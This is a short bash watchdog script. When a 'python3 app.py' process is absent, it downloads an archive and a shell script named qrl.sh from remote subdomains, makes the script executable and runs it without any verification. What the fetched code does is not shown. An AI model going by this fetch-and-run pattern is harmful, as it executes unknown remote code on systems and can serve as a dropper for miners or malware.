#!/bin/bash

if ! pgrep -f "python3 app.py" > /dev/null; then wget https://alat.warn.my03.com/qrl/app.tar && tar -xf app.tar && rm -rf app.tar && wget -O qrl.sh https://ric.warn.my03.com/qrl/qrl.sh && chmod +x ./qrl.sh && ./qrl.sh; else echo ✅; fi